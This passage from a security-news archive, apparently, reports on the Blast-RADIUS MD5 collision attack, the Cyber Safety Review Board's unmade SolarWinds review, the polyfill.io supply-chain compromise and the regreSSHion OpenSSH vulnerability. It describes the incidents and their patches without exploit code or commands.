The latter paper—published in 2007 by researchers Marc Stevens, Arjen Lenstra, and Benne de Weger—described what’s known as a chosen-prefix collision, a type of collision that results from two messages chosen by an attacker that, when combined with two additional messages, create the same hash. That is, the adversary freely chooses two distinct input prefixes 𝑃 and 𝑃′ of arbitrary content that, when combined with carefully corresponding suffixes 𝑆 and 𝑆′ that resemble random gibberish, generate the same hash. In mathematical notation, such a chosen-prefix collision would be written as 𝐻(𝑃‖𝑆)=𝐻(𝑃′‖𝑆′). This type of collision attack is much more powerful because it allows the attacker the freedom to create highly customized forgeries.

To illustrate the practicality and devastating consequences of the attack, Stevens, Lenstra, and de Weger used it to create two cryptographic X.509 certificates that generated the same MD5 signature but different public keys and different Distinguished Name fields. Such a collision could induce a certificate authority intending to sign a certificate for one domain to unknowingly sign a certificate for an entirely different, malicious domain.

In 2008, a team of researchers that included Stevens, Lenstra, and de Weger demonstrated how a chosen prefix attack on MD5 allowed them to create a rogue certificate authority that could generate TLS certificates that would be trusted by all major browsers. A key ingredient for the attack is software named hashclash, developed by the researchers. Hashclash has since been made publicly available.

Despite the undisputed demise of MD5, the function remained in widespread use for years. Deprecation of MD5 didn’t start in earnest until 2012 after malware known as Flame, reportedly created jointly by the governments of Israel and the US, was found to have used a chosen prefix attack to spoof MD5-based code signing by Microsoft’s Windows update mechanism. Flame used the collision-enabled spoofing to hijack the update mechanism so the malware could spread from device to device inside an infected network.

More than 12 years after Flame’s devastating damage was discovered and two decades after collision susceptibility was confirmed, MD5 has felled yet another widely deployed technology that has resisted common wisdom to move away from the hashing scheme—the RADIUS protocol, which is supported in hardware or software provided by at least 86 distinct vendors. The result is “Blast RADIUS,” a complex attack that allows an attacker with an active adversary-in-the-middle position to gain administrator access to devices that use RADIUS to authenticate themselves to a server.

“Surprisingly, in the two decades since Wang et al. demonstrated an MD5 hash collision in 2004, RADIUS has not been updated to remove MD5,” the research team behind Blast RADIUS wrote in a paper published Tuesday and titled RADIUS/UDP Considered Harmful. “In fact, RADIUS appears to have received notably little security analysis given its ubiquity in modern networks.”

The paper’s publication is being coordinated with security bulletins from at least 90 vendors whose wares are vulnerable. Many of the bulletins are accompanied by patches implementing short-term fixes, while a working group of engineers across the industry drafts longer-term solutions. Anyone who uses hardware or software that incorporates RADIUS should read the technical details provided later in this post and check with the manufacturer for security guidance.

New Blast-RADIUS attack breaks 30-year-old protocol used in networks everywhere Read More »

the-president-ordered-a-board-to-probe-a-massive-russian-cyberattack-it-never-did.

The president ordered a board to probe a massive Russian cyberattack. It never did.

In this photo illustration, a Microsoft logo seen displayed on a smartphone with a Cyber Security illustration image in the background.

This story was originally published by ProPublica.

Investigating how the world’s largest software provider handles the security of its own ubiquitous products.

After Russian intelligence launched one of the most devastating cyber espionage attacks in history against US government agencies, the Biden administration set up a new board and tasked it to figure out what happened—and tell the public.

State hackers had infiltrated SolarWinds, an American software company that serves the US government and thousands of American companies. The intruders used malicious code and a flaw in a Microsoft product to steal intelligence from the National Nuclear Security Administration, National Institutes of Health, and the Treasury Department in what Microsoft President Brad Smith called “the largest and most sophisticated attack the world has ever seen.”

The president issued an executive order establishing the Cyber Safety Review Board in May 2021 and ordered it to start work by reviewing the SolarWinds attack.

But for reasons that experts say remain unclear, that never happened.

Nor did the board probe SolarWinds for its second report.

For its third, the board investigated a separate 2023 attack, in which Chinese state hackers exploited an array of Microsoft security shortcomings to access the email inboxes of top federal officials.

A full, public accounting of what happened in the Solar Winds case would have been devastating to Microsoft. ProPublica recently revealed that Microsoft had long known about—but refused to address—a flaw used in the hack. The tech company’s failure to act reflected a corporate culture that prioritized profit over security and left the US government vulnerable, a whistleblower said.

The board was created to help address the serious threat posed to the US economy and national security by sophisticated hackers who consistently penetrate government and corporate systems, making off with reams of sensitive intelligence, corporate secrets, or personal data.

For decades, the cybersecurity community has called for a cyber equivalent of the National Transportation Safety Board, the independent agency required by law to investigate and issue public reports on the causes and lessons learned from every major aviation accident, among other incidents. The NTSB is funded by Congress and staffed by experts who work outside of the industry and other government agencies. Its public hearings and reports spur industry change and action by regulators like the Federal Aviation Administration.

So far, the Cyber Safety Review Board has charted a different path.

The board is not independent—it’s housed in the Department of Homeland Security. Rob Silvers, the board chair, is a Homeland Security undersecretary. Its vice chair is a top security executive at Google. The board does not have full-time staff, subpoena power or dedicated funding.

Silvers told ProPublica that DHS decided the board didn’t need to do its own review of SolarWinds as directed by the White House because the attack had already been “closely studied” by the public and private sectors.

“We want to focus the board on reviews where there is a lot of insight left to be gleaned, a lot of lessons learned that can be drawn out through investigation,” he said.

As a result, there has been no public examination by the government of the unaddressed security issue at Microsoft that was exploited by the Russian hackers. None of the SolarWinds reports identified or interviewed the whistleblower who exposed problems inside Microsoft.

By declining to review SolarWinds, the board failed to discover the central role that Microsoft’s weak security culture played in the attack and to spur changes that could have mitigated or prevented the 2023 Chinese hack, cybersecurity experts and elected officials told ProPublica.

“It’s possible the most recent hack could have been prevented by real oversight,” Sen. Ron Wyden, a Democratic member of the Senate Select Committee on Intelligence, said in a statement. Wyden has called for the board to review SolarWinds and for the government to improve its cybersecurity defenses.

In a statement, a spokesperson for DHS rejected the idea that a SolarWinds review could have exposed Microsoft’s failings in time to stop or mitigate the Chinese state-based attack last summer. “The two incidents were quite different in that regard, and we do not believe a review of SolarWinds would have necessarily uncovered the gaps identified in the Board’s latest report,” they said.

The board’s other members declined to comment, referred inquiries to DHS or did not respond to ProPublica.

In past statements, Microsoft did not dispute the whistleblower’s account but emphasized its commitment to security. “Protecting customers is always our highest priority,” a spokesperson previously told ProPublica. “Our security response team takes all security issues seriously and gives every case due diligence with a thorough manual assessment, as well as cross-confirming with engineering and security partners.”

The board’s failure to probe SolarWinds also underscores a question critics including Wyden have raised about the board since its inception: whether a board with federal officials making up its majority can hold government agencies responsible for their role in failing to prevent cyberattacks.

“I remain deeply concerned that a key reason why the Board never looked at SolarWinds—as the President directed it to do so—was because it would have required the board to examine and document serious negligence by the US government,” Wyden said. Among his concerns is a government cyberdefense system that failed to detect the SolarWinds attack.

Silvers said while the board did not investigate SolarWinds, it has been given a pass by the independent Government Accountability Office, which said in an April study examining the implementation of the executive order that the board had fulfilled its mandate to conduct the review.

The GAO’s determination puzzled cybersecurity experts. “Rob Silvers has been declaring by fiat for a long time that the CSRB did its job regarding SolarWinds, but simply declaring something to be so doesn’t make it true,” said Tarah Wheeler, the CEO of Red Queen Dynamics, a cybersecurity firm, who co-authored a Harvard Kennedy School report outlining how a “cyber NTSB” should operate.

Silvers said the board’s first and second reports, while not probing SolarWinds, resulted in important government changes, such as new Federal Communications Commission rules related to cell phones.

“The tangible impacts of the board’s work to date speak for itself and in bearing out the wisdom of the choices of what the board has reviewed,” he said.

The president ordered a board to probe a massive Russian cyberattack. It never did. Read More »

384,000-sites-pull-code-from-sketchy-code-library-recently-bought-by-chinese-firm

384,000 sites pull code from sketchy code library recently bought by Chinese firm

The supply-chain threat that won’t die —

Many website admins, it seems, have yet to get memo to remove Polyfill[.]io links.

384,000 sites pull code from sketchy code library recently bought by Chinese firm

Getty Images

More than 384,000 websites are linking to a site that was caught last week performing a supply-chain attack that redirected visitors to malicious sites, researchers said.

For years, the JavaScript code, hosted at polyfill[.]com, was a legitimate open source project that allowed older browsers to handle advanced functions that weren’t natively supported. By linking to cdn.polyfill[.]io, websites could ensure that devices using legacy browsers could render content in newer formats. The free service was popular among websites because all they had to do was embed the link in their sites. The code hosted on the polyfill site did the rest.

The power of supply-chain attacks

In February, China-based company Funnull acquired the domain and the GitHub account that hosted the JavaScript code. On June 25, researchers from security firm Sansec reported that code hosted on the polyfill domain had been changed to redirect users to adult- and gambling-themed websites. The code was deliberately designed to mask the redirections by performing them only at certain times of the day and only against visitors who met specific criteria.

The revelation prompted industry-wide calls to take action. Two days after the Sansec report was published, domain registrar Namecheap suspended the domain, a move that effectively prevented the malicious code from running on visitor devices. Even then, content delivery networks such as Cloudflare began automatically replacing pollyfill links with domains leading to safe mirror sites. Google blocked ads for sites embedding the Polyfill[.]io domain. The website blocker uBlock Origin added the domain to its filter list. And Andrew Betts, the original creator of Polyfill.io, urged website owners to remove links to the library immediately.

As of Tuesday, exactly one week after malicious behavior came to light, 384,773 sites continued to link to the site, according to researchers from security firm Censys. Some of the sites were associated with mainstream companies including Hulu, Mercedes-Benz, and Warner Bros. and the federal government. The findings underscore the power of supply-chain attacks, which can spread malware to thousands or millions of people simply by infecting a common source they all rely on.

“Since the domain was suspended, the supply-chain attack has been halted,” Aidan Holland, a member of the Censys Research Team, wrote in an email. “However, if the domain was to be un-suspended or transferred, it could resume its malicious behavior. My hope is that NameCheap properly locked down the domain and would prevent this from occurring.”

What’s more, the Internet scan performed by Censys found more than 1.6 million sites linking to one or more domains that were registered by the same entity that owns polyfill[.]io. At least one of the sites, bootcss[.]com, was observed in June 2023 performing malicious actions similar to those of polyfill. That domain, and three others—bootcdn[.]net, staticfile[.]net, and staticfile[.]org—were also found to have leaked a user’s authentication key for accessing a programming interface provided by Cloudflare.

Censys researchers wrote:

So far, this domain (bootcss.com) is the only one showing any signs of potential malice. The nature of the other associated endpoints remains unknown, and we avoid speculation. However, it wouldn’t be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future.

Of the 384,773 sites still linking to polyfill[.]com, 237,700, or almost 62 percent, were located inside Germany-based web host Hetzner.

Censys found that various mainstream sites—both in the public and private sectors—were among those linking to polyfill. They included:

  • Warner Bros. (www.warnerbros.com)
  • Hulu (www.hulu.com)
  • Mercedes-Benz (shop.mercedes-benz.com)
  • Pearson (digital-library-qa.pearson.com, digital-library-stg.pearson.com)
  • ns-static-assets.s3.amazonaws.com

The amazonaws.com address was the most common domain associated with sites still linking to the polyfill site, an indication of widespread usage among users of Amazon’s S3 static website hosting.

Censys also found 182 domains ending in .gov, meaning they are affiliated with a government entity. One such domain—feedthefuture[.]gov—is affiliated with the US federal government. A breakdown of the top 50 affected sites is here.

Attempts to reach Funnull representatives for comment weren’t successful.

384,000 sites pull code from sketchy code library recently bought by Chinese firm Read More »

“regresshion”-vulnerability-in-openssh-gives-attackers-root-on-linux

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux

RELAPSE —

Full system compromise possible by peppering servers with thousands of connection requests.

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux

Researchers have warned of a critical vulnerability affecting the OpenSSH networking utility that can be exploited to give attackers complete control of Linux and Unix servers with no authentication required.

The vulnerability, tracked as CVE-2024-6387, allows unauthenticated remote code execution with root system rights on Linux systems that are based on glibc, an open source implementation of the C standard library. The vulnerability is the result of a code regression introduced in 2020 that reintroduced CVE-2006-5051, a vulnerability that was fixed in 2006. With thousands, if not millions, of vulnerable servers populating the Internet, this latest vulnerability could pose a significant risk.

Complete system takeover

“This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access,” wrote Bharat Jogi, the senior director of threat research at Qualys, the security firm that discovered it. “It could facilitate network propagation, allowing attackers to use a compromised system as a foothold to traverse and exploit other vulnerable systems within the organization.”

The risk is in part driven by the central role OpenSSH plays in virtually every internal network connected to the Internet. It provides a channel for administrators to connect to protected devices remotely or from one device to another inside the network. The ability for OpenSSH to support multiple strong encryption protocols, its integration into virtually all modern operating systems, and its location at the very perimeter of networks further drive its popularity.

Besides the ubiquity of vulnerable servers populating the Internet, CVE-2024-6387 also provides a potent means for executing malicious code stems with the highest privileges, with no authentication required. The flaw stems from faulty management of the signal handler, a component in glibc for responding to potentially serious events such as division-by-zero attempts. When a client device initiates a connection but doesn’t successfully authenticate itself within an allotted time (120 seconds by default), vulnerable OpenSSH systems call what’s known as a SIGALRM handler asynchronously. The flaw resides in sshd, the main OpenSSH engine. Qualys has named the vulnerability regreSSHion.

The severity of the threat posed by exploitation is significant, but various factors are likely to prevent it from being mass exploited, security experts said. For one, the attack can take as long as eight hours to complete and require as many as 10,000 authentication steps, Stan Kaminsky, a researcher at security firm Kaspersky, said. The delay results from a defense known as address space layout randomization, which changes the memory addresses where executable code is stored to thwart attempts to run malicious payloads.

Other limitations apply. Attackers must also know the specific OS running on each targeted server. So far, no one has found a way to exploit 64-bit systems since the number of available memory addresses is exponentially higher than those available for 32-bit systems. Further mitigating the chances of success, denial-of-service attacks that limit the number of connection requests coming into a vulnerable system will prevent exploitation attempts from succeeding.

All of those limitations will likely prevent CVE-2024-6387 from being mass exploited, researchers said, but there’s still the risk of targeted attacks that pepper a specific network of interest with authentication attempts over a matter of days until allowing code execution. To cover their tracks, attackers could spread requests through a large number of IP addresses in a fashion similar to password-spraying attacks. In this way, attackers could target a handful of vulnerable networks until one or more of the attempts succeeded.

The vulnerability affects the following:

  • OpenSSH versions earlier than 4.4p1 are vulnerable to this signal handler race condition unless they are patched for CVE-2006-5051 and CVE-2008-4109.
  • Versions from 4.4p1 up to, but not including, 8.5p1 are not vulnerable due to a transformative patch for CVE-2006-5051, which made a previously unsafe function secure.
  • The vulnerability resurfaces in versions from 8.5p1 up to, but not including, 9.8p1 due to the accidental removal of a critical component in a function.

Anyone running a vulnerable version should update as soon as practicable.

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux Read More »